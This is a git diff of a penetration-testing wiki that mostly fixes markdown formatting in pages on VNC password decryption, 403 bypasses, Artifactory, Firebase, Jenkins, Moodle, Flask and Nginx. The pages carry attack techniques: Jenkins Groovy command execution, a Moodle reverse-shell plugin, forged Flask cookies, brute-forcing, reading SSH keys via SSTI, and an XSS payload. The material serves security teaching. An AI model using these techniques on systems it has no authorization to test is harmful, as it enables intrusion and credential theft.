 If you have the VNC password and it looks encrypted (a few bytes, like if it could be and encrypted password). It is probably ciphered with 3des. You can get the clear text password using [https://github.com/jeroennijhof/vncpwd](https://github.com/jeroennijhof/vncpwd)
 
@@ -39,7 +39,7 @@ vncpwd <vnc password file>
 ```
 
 You can do this because the password used inside 3des to encrypt the plain-text VNC passwords was reversed years ago.\
-For **Windows **you can also use this tool: [https://www.raymond.cc/blog/download/did/232/](https://www.raymond.cc/blog/download/did/232/)\
+For **Windows** you can also use this tool: [https://www.raymond.cc/blog/download/did/232/](https://www.raymond.cc/blog/download/did/232/)\
 I save the tool here also for ease of access:
 
 {% file src="../.gitbook/assets/vncpwd.zip" %}
diff --git a/pentesting/pentesting-web/403-and-401-bypasses.md b/pentesting/pentesting-web/403-and-401-bypasses.md
index 719571ff..6befe245 100644
--- a/pentesting/pentesting-web/403-and-401-bypasses.md
+++ b/pentesting/pentesting-web/403-and-401-bypasses.md
@@ -4,7 +4,7 @@
 
 Try using **different verbs** to access the file: `GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK`
 
-* Check the response headers, maybe some information can be given. For example, a **200 response **to **HEAD **with `Content-Length: 55` means that the **HEAD verb can access the info**. But you still need to find a way to exfiltrate that info.
+* Check the response headers, maybe some information can be given. For example, a **200 response** to **HEAD** with `Content-Length: 55` means that the **HEAD verb can access the info**. But you still need to find a way to exfiltrate that info.
 * Using a HTTP header like `X-HTTP-Method-Override: PUT` can overwrite the verb used.
 * Use **`TRACE`** verb and if you are very lucky maybe in the response you can see also the **headers added by intermediate proxies** that might be useful.
 
@@ -32,9 +32,9 @@ Try using **different verbs** to access the file: `GET, HEAD, POST, PUT, DELETE,
 
     * `X-Original-URL: /admin/console`
     * `X-Rewrite-URL: /admin/console`
-* If the page is** behind a proxy**, maybe it's the proxy the one preventing you you to access the private information. Try abusing [**HTTP Request Smuggling**](../../pentesting-web/http-request-smuggling/)** or **[**hop-by-hop headers**](../../pentesting-web/abusing-hop-by-hop-headers.md)**.**
+* If the page is **behind a proxy**, maybe it's the proxy the one preventing you you to access the private information. Try abusing [**HTTP Request Smuggling**](../../pentesting-web/http-request-smuggling/) **or** [**hop-by-hop headers**](../../pentesting-web/abusing-hop-by-hop-headers.md)**.**
 * Fuzz [**special HTTP headers**](special-http-headers.md) looking for different response.
-  * **Fuzz special HTTP headers **while fuzzing **HTTP Methods**.
+  * **Fuzz special HTTP headers** while fuzzing **HTTP Methods**.
 
 ## Path **Fuzzing**
 
diff --git a/pentesting/pentesting-web/artifactory-hacking-guide.md b/pentesting/pentesting-web/artifactory-hacking-guide.md
index 8b1a98a0..17ed99c9 100644
--- a/pentesting/pentesting-web/artifactory-hacking-guide.md
+++ b/pentesting/pentesting-web/artifactory-hacking-guide.md
@@ -1,10 +1,10 @@
 # Artifactory Hacking guide
 
-**This content was taken from **[**https://www.errno.fr/artifactory/Attacking_Artifactory**](https://www.errno.fr/artifactory/Attacking_Artifactory)****
+**This content was taken from** [**https://www.errno.fr/artifactory/Attacking\_Artifactory**](https://www.errno.fr/artifactory/Attacking\_Artifactory)****
 
-## Artifactory basics <a href="artifactory-basics" id="artifactory-basics"></a>
+## Artifactory basics <a href="#artifactory-basics" id="artifactory-basics"></a>
 
-### Default users and passwords <a href="default-users-and-passwords" id="default-users-and-passwords"></a>
+### Default users and passwords <a href="#default-users-and-passwords" id="default-users-and-passwords"></a>
 
 Artifactory’s default accounts are:
 
@@ -16,19 +16,19 @@ Artifactory’s default accounts are:
 
 By default, no password locking policy is in place which makes Artifactory a prime target for credential stuffing and password spraying attacks.
 
-### Authorizations <a href="authorizations" id="authorizations"></a>
+### Authorizations <a href="#authorizations" id="authorizations"></a>
 
 Ideally, this is what you should see when connecting to Artifactory:
 
-![Login page](https://www.errno.fr/artifactory/artif_login.png)
+![Login page](https://www.errno.fr/artifactory/artif\_login.png)
 
 On the other hand, if you’re greeted with something more akin to this:
 
-![Default page](https://www.errno.fr/artifactory/artif_default.png)
+![Default page](https://www.errno.fr/artifactory/artif\_default.png)
 
 It means that “Anonymous access” has been enabled in the administration panel, which is a common setting used to let applications retrieve artifacts without hassle but lets you, the attacker, see more than is preferable.
 
-### Checking account rights <a href="checking-account-rights" id="checking-account-rights"></a>
+### Checking account rights <a href="#checking-account-rights" id="checking-account-rights"></a>
 
 Sometimes, because of a misconfiguration, anonymous is allowed to deploy files to some repositories!
 
@@ -43,11 +43,11 @@ If there are any `repoKey` entries in the request, anonymous can deploy to these
 
 This can be generalized to other accounts once you get a password or token for them.
 
-### Listing users <a href="listing-users" id="listing-users"></a>
+### Listing users <a href="#listing-users" id="listing-users"></a>
 
 For some reason listing users is a right reserved to admins only. I found an alternate way to list users (those that are actively deploying at least) that relies on the “Deployed By” value of artifacts:
 
-![Deployed By](https://www.errno.fr/artifactory/artif_deployed_by.png)
+![Deployed By](https://www.errno.fr/artifactory/artif\_deployed\_by.png)
 
 [This script](https://gist.github.com/gquere/347e8e042490be87e6e9e32e428cb47a) simply tries to recursively find all the users that have deployed artifacts. Note that it could take a while to complete if there are a lot of repositories (>1000).
 
@@ -60,7 +60,7 @@ Found user user
 Found user test_deploy
 ```
 
-### Permissions <a href="permissions" id="permissions"></a>
+### Permissions <a href="#permissions" id="permissions"></a>
 
 Here are the basic permissions and their usefulness:
 
@@ -70,17 +70,17 @@ Here are the basic permissions and their usefulness:
 * Annotate: necessary for CVE-2020-7931
 * Read: usually a default permission
 
-## Known vulnerabilities <a href="known-vulnerabilities" id="known-vulnerabilities"></a>
+## Known vulnerabilities <a href="#known-vulnerabilities" id="known-vulnerabilities"></a>
 
 Here is a curated list of high impact public vulnerabilities:
 
-### CVE-2016-10036: Arbitrary File Upload & RCE (<4.8.6) <a href="cve-2016-10036-arbitrary-file-upload--rce-486" id="cve-2016-10036-arbitrary-file-upload--rce-486"></a>
+### CVE-2016-10036: Arbitrary File Upload & RCE (<4.8.6) <a href="#cve-2016-10036-arbitrary-file-upload--rce-486" id="cve-2016-10036-arbitrary-file-upload--rce-486"></a>
 
 [Details here.](https://www.exploit-db.com/exploits/44543)
 
 This one is getting a bit old and it’s unlikely you’ll stumble on such an outdated Artifactory version. Nevertheless it’s quite effective, as it is a simple directory traversal which nets arbitrary code execution at the Tomcat level.
 
-### CVE-2019-9733: Authentication bypass (<6.8.6) <a href="cve-2019-9733-authentication-bypass-686" id="cve-2019-9733-authentication-bypass-686"></a>
+### CVE-2019-9733: Authentication bypass (<6.8.6) <a href="#cve-2019-9733-authentication-bypass-686" id="cve-2019-9733-authentication-bypass-686"></a>
 
 [Original advisory here.](https://www.ciphertechs.com/jfrog-artifactory-advisory/)
 
@@ -88,7 +88,7 @@ On older versions of Artifactory (up to 6.7.3), the `access-admin` account used
 
 This local account is normally forbidden to access the UI or API, but until version 6.8.6 Artifactory could be tricked into believing the request emanated locally if the `X-Forwarded-For` HTTP header was set to `127.0.0.1`.
 
-### CVE-2020-7931: Server-Side Template Injection (Artifactory Pro) <a href="cve-2020-7931-server-side-template-injection-artifactory-pro" id="cve-2020-7931-server-side-template-injection-artifactory-pro"></a>
+### CVE-2020-7931: Server-Side Template Injection (Artifactory Pro) <a href="#cve-2020-7931-server-side-template-injection-artifactory-pro" id="cve-2020-7931-server-side-template-injection-artifactory-pro"></a>
 
 [Original advisory here.](https://github.com/atredispartners/advisories/blob/master/ATREDIS-2019-0006.md)
 
@@ -99,7 +99,7 @@ These are required for exploitation:
 * a user with deploy (create files) and annotate (set filtered) rights
 * Artifactory Pro
 
-The vulnerability is rather simple: if a deployed resource is set to filtered it is interpreted as a Freemarker Template, which gives the attacker a SSTI attack window. ![Filtered Resource](https://www.errno.fr/artifactory/artif_filtered.png)
+The vulnerability is rather simple: if a deployed resource is set to filtered it is interpreted as a Freemarker Template, which gives the attacker a SSTI attack window. ![Filtered Resource](https://www.errno.fr/artifactory/artif\_filtered.png)
 
 Here are the implemented primitives:
 
@@ -108,12 +108,12 @@ Here are the implemented primitives:
 
 These should be enough to give you remote code execution in a number of manners, from the easiest/quietest to the hardest/noisiest:
 
-* reading a secret on the filesystem that lets you pivot (/home/user/.bash_history, /home/user/password.txt, /home/user/.ssh/id_rsa …)
+* reading a secret on the filesystem that lets you pivot (/home/user/.bash\_history, /home/user/password.txt, /home/user/.ssh/id\_rsa …)
 * adding an SSH key to the user
 * deploying a .war to execute a servlet
 * deploying an Artifactory Groovy user script
 
-#### .war stories: Java renameTo() shenanigans <a href="war-stories-java-renameto-shenanigans" id="war-stories-java-renameto-shenanigans"></a>
+#### .war stories: Java renameTo() shenanigans <a href="#war-stories-java-renameto-shenanigans" id="war-stories-java-renameto-shenanigans"></a>
 
 This is a little story of how I banged my head against the wall for hours if not days during a pentest. I came accross an outdated Artifactory which I knew was vulnerable to CVE-2020-7931. I deployed the original’s advisory SSTI template and started perusing through the filesystem. It seemed that Artifactory had been installed in a non-standard location, which isn’t too unusual as admins like to keep separated partitions between application binaries, data, logs and configuration (this is a good thing!). There were no SSH keys or passwords in the user’s home directory that would have provided me with an easy pivot, so there came the time to be less discreet and write to the filesystem. Dropping the initial payload (a public key) in Artifactory’s upload directory went fine, but I just couldn’t manage to move it to the SSH keys directory. So I went back to my exploitation sandbox, tested it again and lo and behold, it worked fine. So there had to be a different configuration that prevented me from completing the `renameTo()` method. At this point it’s always a good idea to [check the documentation](https://docs.oracle.com/javase/8/docs/api/java/io/File.html#renameTo-java.io.File-) … which clearly states that you cannot rename files accross different filesystems, which I guess makes sense depending on the implementation of the method, i.e. if it works at an inode level. Arg.
 
@@ -125,13 +125,13 @@ Come next morning, I’m sobbing at my desk looking a last time at Artifactory
 
 Fortunately, all pentests don’t go like this :)
 
-## Post-Exploitation <a href="post-exploitation" id="post-exploitation"></a>
+## Post-Exploitation <a href="#post-exploitation" id="post-exploitation"></a>
 
 The following are only useful once you’ve achieved remote code execution or arbitrary file read on the server and might help you pivoting to another machine.
 
-### Storage of passwords and external secrets <a href="storage-of-passwords-and-external-secrets" id="storage-of-passwords-and-external-secrets"></a>
+### Storage of passwords and external secrets <a href="#storage-of-passwords-and-external-secrets" id="storage-of-passwords-and-external-secrets"></a>
 
-#### Local passwords <a href="local-passwords" id="local-passwords"></a>
+#### Local passwords <a href="#local-passwords" id="local-passwords"></a>
 
 Local artifactory passwords are stored in either salted MD5 or bcrypt form, the former being deprecated.
 
@@ -157,7 +157,7 @@ Loaded 1 password hash (bcrypt [Blowfish 32/64 X2])
 password          (admin)
 ```
 
-#### Remote secrets <a href="remote-secrets" id="remote-secrets"></a>
+#### Remote secrets <a href="#remote-secrets" id="remote-secrets"></a>
 
 Artifactory may need to store secrets to identify to remote services. These secrets aren’t hashed of course, they’re stored encrypted on the disk, with the key next to them. There are two types of secrets mentionned in the [official documentation](https://jfrog.com/knowledge-base/what-are-the-artifactory-key-master-key-and-what-are-they-used-for/).
 
@@ -201,7 +201,7 @@ Where:
 
 This tool I wrote can be used offline to decrypt Artifactory secrets: [ArtifactoryDecryptor](https://github.com/gquere/ArtifactoryDecryptor).
 
-## Defending Artifactory <a href="defending-artifactory" id="defending-artifactory"></a>
+## Defending Artifactory <a href="#defending-artifactory" id="defending-artifactory"></a>
 
 If you’re the blue team or an Artifactory admin, by now you should have a pretty good idea of what to do:
 
diff --git a/pentesting/pentesting-web/buckets/firebase-database.md b/pentesting/pentesting-web/buckets/firebase-database.md
index 23c46468..aca55999 100644
--- a/pentesting/pentesting-web/buckets/firebase-database.md
+++ b/pentesting/pentesting-web/buckets/firebase-database.md
@@ -6,22 +6,22 @@ Firebase is a Backend-as-a-Services mainly for mobile application. It is focused
 
 ### Pentest Methodology
 
-Therefore, some **Firebase endpoints **could be found in **mobile applications**. It is possible that the Firebase endpoint used is** configured badly grating everyone privileges to read (and write)** on it.
+Therefore, some **Firebase endpoints** could be found in **mobile applications**. It is possible that the Firebase endpoint used is **configured badly grating everyone privileges to read (and write)** on it.
 
 This is the common methodology to search and exploit poorly configured Firebase databases:
 
 1. **Get the APK** of app you can use any of the tool to get the APK from the device for this POC.\
    You can use “APK Extractor” [https://play.google.com/store/apps/details?id=com.ext.ui\&hl=e](https://hackerone.com/redirect?signature=3774f35d1b5ea8a4fd209d80084daa9f5887b105\&url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.ext.ui%26hl%3Den)
-2. **Decompile **the APK using **apktool**, follow the below command to extract the source code from the APK.
+2. **Decompile** the APK using **apktool**, follow the below command to extract the source code from the APK.
 3. Go to the _**res/values/strings.xml**_ and look for this and **search** for “**firebase**” keyword
 4. You may find something like this URL “_**https://xyz.firebaseio.com/**_”
-5. Next, go to the browser and **navigate to the found URL**:_ https://xyz.firebaseio.com/.json_
+5. Next, go to the browser and **navigate to the found URL**: _https://xyz.firebaseio.com/.json_
 6. 2 type of responses can appear:
    1. “**Permission Denied**”: This means that you cannot access it, so it's well configured
    2. “**null**” response or a bunch of **JSON data**: This means that the database is public and you at least have read access.
       1. In this case, you could **check for writing privileges**, an exploit to test writing privileges can be found here: [https://github.com/MuhammadKhizerJaved/Insecure-Firebase-Exploit](https://github.com/MuhammadKhizerJaved/Insecure-Firebase-Exploit)
 
-**Interesting note**: When analysing a mobile application with **MobSF**, if it finds a firebase database it will check if this is** publicly available** and will notify it.
+**Interesting note**: When analysing a mobile application with **MobSF**, if it finds a firebase database it will check if this is **publicly available** and will notify it.
 
 Alternatively, you can use [Firebase Scanner](https://github.com/shivsahni/FireBaseScanner), a python script that automates the task above as shown below:
 
@@ -69,4 +69,4 @@ You may be able to access some interesting information
 ## References
 
 * [https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/](https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/)
-*  [https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1](https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1)
+* &#x20;[https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1](https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1)
diff --git a/pentesting/pentesting-web/drupal.md b/pentesting/pentesting-web/drupal.md
index 960698c6..1a2a6321 100644
--- a/pentesting/pentesting-web/drupal.md
+++ b/pentesting/pentesting-web/drupal.md
@@ -4,7 +4,7 @@
 
 ### Register
 
-In_ /user/register_ just try to create a username and if the name is already taken it will be notified:
+In _/user/register_ just try to create a username and if the name is already taken it will be notified:
 
 ![](<../../.gitbook/assets/image (254).png>)
 
@@ -45,9 +45,9 @@ curl https://example.com/config/sync/swiftmailer.transport.yml
 
 ## Code execution inside Drupal with admin creds
 
-You need the **plugin php to be installed** (check it accessing to_ /modules/php_ and if it returns a **403 **then, **exists**, if **not found**, then the **plugin php isn't installed**)
+You need the **plugin php to be installed** (check it accessing to _/modules/php_ and if it returns a **403** then, **exists**, if **not found**, then the **plugin php isn't installed**)
 
-Go to _Modules _-> (**Check**) _PHP Filter_  -> _Save configuration_
+Go to _Modules_ -> (**Check**) _PHP Filter_  -> _Save configuration_
 
 ![](<../../.gitbook/assets/image (252).png>)
 
diff --git a/pentesting/pentesting-web/flask.md b/pentesting/pentesting-web/flask.md
index e7e2efb3..ea337287 100644
--- a/pentesting/pentesting-web/flask.md
+++ b/pentesting/pentesting-web/flask.md
@@ -1,6 +1,6 @@
 # Flask
 
-**Probably if you are playing a CTF a Flask application will be related to **[**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.**
+**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.**
 
 ## Cookies
 
@@ -20,7 +20,7 @@ echo "ImhlbGxvIg" | base64 -d
 
 The cookie is also signed using a password
 
-###  **Flask-Unsign**
+### &#x20;**Flask-Unsign**
 
 Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
 
@@ -56,4 +56,4 @@ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
 
 ### SQLi in Flask session cookie with SQLmap
 
-[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval)** **uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
+[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) **** uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
diff --git a/pentesting/pentesting-web/h2-java-sql-database.md b/pentesting/pentesting-web/h2-java-sql-database.md
index 4d467cdb..1218d59c 100644
--- a/pentesting/pentesting-web/h2-java-sql-database.md
+++ b/pentesting/pentesting-web/h2-java-sql-database.md
@@ -4,11 +4,11 @@ Official page: [https://www.h2database.com/html/main.html](https://www.h2databas
 
 ### Tricks
 
-You can indicate a** non-existent name a of database** in order to **create a new database without valid credentials** (**unauthenticated**):
+You can indicate a **non-existent name a of database** in order to **create a new database without valid credentials** (**unauthenticated**):
 
 ![](<../../.gitbook/assets/image (258).png>)
 
-Or if you know that for example a** mysql is running** and you know the** database name** and the **credentials **for that database, you can just access it:
+Or if you know that for example a **mysql is running** and you know the **database name** and the **credentials** for that database, you can just access it:
 
 ![](<../../.gitbook/assets/image (259).png>)
 
diff --git a/pentesting/pentesting-web/jboss.md b/pentesting/pentesting-web/jboss.md
index f024348f..e9b666c2 100644
--- a/pentesting/pentesting-web/jboss.md
+++ b/pentesting/pentesting-web/jboss.md
@@ -4,13 +4,13 @@
 
 The _/web-console/ServerInfo.jsp_ and _/status?full=true_ web pages often reveal **server details**.
 
-You can expose **management servlets **via the following paths within JBoss (depending on the version): _/admin-console_, _/jmx-console_, _/management_, and _/web-console_. Default credentials are **admin**/**admin**. Upon gaining access, you can use available invoker servlets to interact with exposed MBeans:
+You can expose **management servlets** via the following paths within JBoss (depending on the version): _/admin-console_, _/jmx-console_, _/management_, and _/web-console_. Default credentials are **admin**/**admin**. Upon gaining access, you can use available invoker servlets to interact with exposed MBeans:
 
 * /web-console/Invoker (JBoss versions 6 and 7)
 * /invoker/JMXInvokerServlet and /invoker/EJBInvokerServlet (JBoss 5 and prior)
 
-**You can enumerate and even exploit a JBOSS service using **[**clusterd**](https://github.com/hatRiot/clusterd)****\
-**Or using metasploit: **
`msf > use auxiliary/scanner/http/jboss_vulnscan`
+**You can enumerate and even exploit a JBOSS service using** [**clusterd**](https://github.com/hatRiot/clusterd)****\
+**Or using metasploit:**
`msf > use auxiliary/scanner/http/jboss_vulnscan`
 
 ### Exploitation
 
diff --git a/pentesting/pentesting-web/jenkins.md b/pentesting/pentesting-web/jenkins.md
index ae573328..64bbeb61 100644
--- a/pentesting/pentesting-web/jenkins.md
+++ b/pentesting/pentesting-web/jenkins.md
@@ -16,18 +16,18 @@ msf> use auxiliary/scanner/http/jenkins_command
 
 Without credentials you can look inside _**/asynchPeople/**_ path or  _**/securityRealm/user/admin/search/index?q=**_ for **usernames**.
 
-You may be able to get the Jenkins version from the path_** /oops **_or _**/error**_
+You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_
 
 ![](<../../.gitbook/assets/image (415).png>)
 
 ## Login
 
 You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**\
-****Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in **to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
+****Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
 
 ### Bruteforce
 
-**Jekins **does **not **implement any **password policy **or username **brute-force mitigation**. Then, you **should **always try to** brute-force** users because probably** weak passwords** are being used (even **usernames as passwords** or **reverse **usernames as passwords).
+**Jekins** does **not** implement any **password policy** or username **brute-force mitigation**. Then, you **should** always try to **brute-force** users because probably **weak passwords** are being used (even **usernames as passwords** or **reverse** usernames as passwords).
 
 ```
 msf> use auxiliary/scanner/http/jenkins_login
@@ -67,14 +67,14 @@ If you are allowed to configure the project you can **make it execute commands w
 
 ![](<../../.gitbook/assets/image (159).png>)
 
-Click on **Save **and **build **the project and your **command will be executed**.\
+Click on **Save** and **build** the project and your **command will be executed**.\
 If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
 
 ### **Execute Groovy script**
 
 Best way. Less noisy.
 
-1. Go to _path_jenkins/script_
+1. Go to _path\_jenkins/script_
 2. Inside the text box introduce the script
 
 ```python
@@ -84,11 +84,11 @@ println "Found text ${process.text}"
 
 You could execute a command using: `cmd.exe /c dir`
 
-In **linux **you can do:  **`"ls /".execute().text`**
+In **linux** you can do:  **`"ls /".execute().text`**
 
 If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload.
 
-**Another useful groovy script **is (replace \[INSERT COMMAND]):
+**Another useful groovy script** is (replace \[INSERT COMMAND]):
 
 ```python
 def sout = new StringBuffer(), serr = new StringBuffer()
diff --git a/pentesting/pentesting-web/jira.md b/pentesting/pentesting-web/jira.md
index 7aed82f3..2e454f9b 100644
--- a/pentesting/pentesting-web/jira.md
+++ b/pentesting/pentesting-web/jira.md
@@ -3,8 +3,8 @@
 ### Check Privileges
 
 Inside a Jira instance **any user** (even **non-authenticated**) can **check its privileges** in `/rest/api/2/mypermissions` or `/rest/api/3/mypermissions` . These endpoints will return your current privileges.\
-If a **non-authenticated** user have any **privilege**, this is a **vulnerability **(bounty?).\
-If an **authenticated **user have any **unexpected privilege**, this a a **vuln**.
+If a **non-authenticated** user have any **privilege**, this is a **vulnerability** (bounty?).\
+If an **authenticated** user have any **unexpected privilege**, this a a **vuln**.
 
 ```bash
 #Check non-authenticated privileges
@@ -14,4 +14,4 @@ curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"h
 ### Automated enumeration
 
 * [https://github.com/0x48piraj/Jiraffe](https://github.com/0x48piraj/Jiraffe)
-* [https://github.com/bcoles/jira_scan](https://github.com/bcoles/jira_scan)
+* [https://github.com/bcoles/jira\_scan](https://github.com/bcoles/jira\_scan)
diff --git a/pentesting/pentesting-web/moodle.md b/pentesting/pentesting-web/moodle.md
index e1a32073..af7d16fe 100644
--- a/pentesting/pentesting-web/moodle.md
+++ b/pentesting/pentesting-web/moodle.md
@@ -70,17 +70,17 @@ I found that the automatic tools are pretty **useless finding vulnerabilities af
 
 ## **RCE**
 
-You need to have **manager** role and you **can install plugins** inside the** "Site administration" **tab**:**
+You need to have **manager** role and you **can install plugins** inside the **"Site administration"** tab**:**
 
 ![](<../../.gitbook/assets/image (447).png>)
 
 If you are manager you may still need to **activate this option**. You can see how ins the moodle privilege escalation PoC: [https://github.com/HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321).
 
-Then, you can** install the following plugin** that contains the classic pentest-monkey php r**ev shell** (_before uploading it you need to decompress it, change the IP and port of the revshell and crompress it again_)
+Then, you can **install the following plugin** that contains the classic pentest-monkey php r**ev shell** (_before uploading it you need to decompress it, change the IP and port of the revshell and crompress it again_)
 
 {% file src="../../.gitbook/assets/moodle-rce-plugin.zip" %}
 
-Or you could use the plugin from [https://github.com/HoangKien1020/Moodle_RCE](https://github.com/HoangKien1020/Moodle_RCE) to get a regular PHP shell with the "cmd" parameter.
+Or you could use the plugin from [https://github.com/HoangKien1020/Moodle\_RCE](https://github.com/HoangKien1020/Moodle\_RCE) to get a regular PHP shell with the "cmd" parameter.
 
 To access launch the malicious plugin you need to access to:
 
diff --git a/pentesting/pentesting-web/nginx.md b/pentesting/pentesting-web/nginx.md
index 9b5115de..47d59538 100644
--- a/pentesting/pentesting-web/nginx.md
+++ b/pentesting/pentesting-web/nginx.md
@@ -1,6 +1,6 @@
 # Nginx
 
-**Most part of this page was copied from **[**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/)****
+**Most part of this page was copied from** [**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/)****
 
 ## Missing root location
 
@@ -15,7 +15,7 @@ server {
 }
 ```
 
-The root directive specifies the root folder for Nginx. In the above example, the root folder is `/etc/nginx` which means that we can reach files within that folder. The above configuration does not have a location for `/ (location / {...})`, only for `/hello.txt`. Because of this, the `root` directive will be globally set, meaning that requests to `/` will take you to the local path `/etc/nginx`.   
+The root directive specifies the root folder for Nginx. In the above example, the root folder is `/etc/nginx` which means that we can reach files within that folder. The above configuration does not have a location for `/ (location / {...})`, only for `/hello.txt`. Because of this, the `root` directive will be globally set, meaning that requests to `/` will take you to the local path `/etc/nginx`.  &#x20;
 
 A request as simple as `GET /nginx.conf` would reveal the contents of the Nginx configuration file stored in `/etc/nginx/nginx.conf`. If the root is set to `/etc`, a `GET` request to `/nginx/nginx.conf` would reveal the configuration file. In some cases it is possible to reach other configuration files, access-logs and even encrypted credentials for HTTP basic authentication.
 
@@ -67,7 +67,7 @@ alias../ => HTTP status code 403
 
 Some frameworks, scripts and Nginx configurations unsafely use the variables stored by Nginx. This can lead to issues such as XSS, bypassing HttpOnly-protection, information disclosure and in some cases even RCE.
 
-### SCRIPT_NAME
+### SCRIPT\_NAME
 
 With a configuration such as the following:
 
@@ -79,7 +79,7 @@ With a configuration such as the following:
         }
 ```
 
-The main issue will be that Nginx will send any URL to the PHP interpreter ending in `.php` even if the file doesn’t exist on disc. This is a common mistake in many Nginx configurations, as outlined in the “[Pitfalls and Common Mistakes](https://www.nginx.com/resources/wiki/start/topics/tutorials/config_pitfalls/#passing-uncontrolled-requests-to-php)” document created by Nginx. 
+The main issue will be that Nginx will send any URL to the PHP interpreter ending in `.php` even if the file doesn’t exist on disc. This is a common mistake in many Nginx configurations, as outlined in the “[Pitfalls and Common Mistakes](https://www.nginx.com/resources/wiki/start/topics/tutorials/config\_pitfalls/#passing-uncontrolled-requests-to-php)” document created by Nginx.&#x20;
 
 An XSS will occur if the PHP-script tries to define a base URL based on `SCRIPT_NAME`;
 
@@ -98,7 +98,7 @@ SCRIPT_NAME  =  /index.php/<script>alert(1)</script>/index.php
 
 ### Usage of $uri can lead to CRLF Injection
 
-Another misconfiguration related to Nginx variables is to use `$uri` or `$document_uri` instead of `$request_uri`. `$uri` and `$document_uri` contain the normalized URI whereas the `normalization` in Nginx includes URL decoding the URI. [Volema](http://blog.volema.com/nginx-insecurities.html#header:\~:text=Case%202%3A%20rewrite%20with%20%24uri%20\(%24document_uri\)) found that `$uri` is commonly used when creating redirects in the Nginx configuration which results in a CRLF injection.
+Another misconfiguration related to Nginx variables is to use `$uri` or `$document_uri` instead of `$request_uri`. `$uri` and `$document_uri` contain the normalized URI whereas the `normalization` in Nginx includes URL decoding the URI. [Volema](http://blog.volema.com/nginx-insecurities.html#header:\~:text=Case%202%3A%20rewrite%20with%20%24uri%20\(%24document\_uri\)) found that `$uri` is commonly used when creating redirects in the Nginx configuration which results in a CRLF injection.
 
 An example of a vulnerable Nginx configuration is:
 
@@ -124,21 +124,21 @@ Learn more about the risks of CRLF injection and response splitting at  [https:/
 
 ### Any variable
 
-In some cases, user-supplied data can be treated as an Nginx variable. It’s unclear why this may be happening, but it’s not that uncommon or easy to test for as seen in this [H1 report](https://hackerone.com/reports/370094). If we search for the error message, we can see that it is found in the [SSI filter module](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx_http_ssi_filter_module.c#L365), thus revealing that this is due to SSI.
+In some cases, user-supplied data can be treated as an Nginx variable. It’s unclear why this may be happening, but it’s not that uncommon or easy to test for as seen in this [H1 report](https://hackerone.com/reports/370094). If we search for the error message, we can see that it is found in the [SSI filter module](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx\_http\_ssi\_filter\_module.c#L365), thus revealing that this is due to SSI.
 
-One way to test for this is to set a referer header value: 
+One way to test for this is to set a referer header value:&#x20;
 
 ```
 $ curl -H ‘Referer: bar’ http://localhost/foo$http_referer | grep ‘foobar’
 ```
 
-We scanned for this misconfiguration and found several instances where a user could print the value of Nginx variables. The number of found vulnerable instances has declined which could indicate that this was patched. 
+We scanned for this misconfiguration and found several instances where a user could print the value of Nginx variables. The number of found vulnerable instances has declined which could indicate that this was patched.&#x20;
 
 ## Raw backend response reading
 
-With Nginx’s `proxy_pass`, there’s the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that it’s an HTTP response? 
+With Nginx’s `proxy_pass`, there’s the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that it’s an HTTP response?&#x20;
 
-If a client sends an invalid HTTP request to Nginx, that request will be forwarded as-is to the backend, and the backend will answer with its raw content. Then, Nginx won’t understand the invalid HTTP response and just forward it to the client. Imagine a uWSGI application like this: 
+If a client sends an invalid HTTP request to Nginx, that request will be forwarded as-is to the backend, and the backend will answer with its raw content. Then, Nginx won’t understand the invalid HTTP response and just forward it to the client. Imagine a uWSGI application like this:&#x20;
 
 ```
 def application(environ, start_response):
@@ -147,7 +147,7 @@ def application(environ, start_response):
    return [b"Secret info, should not be visible!"]
 ```
 
-And with the following directives in Nginx: 
+And with the following directives in Nginx:&#x20;
 
 ```
 http {
@@ -157,9 +157,9 @@ http {
 }
 ```
 
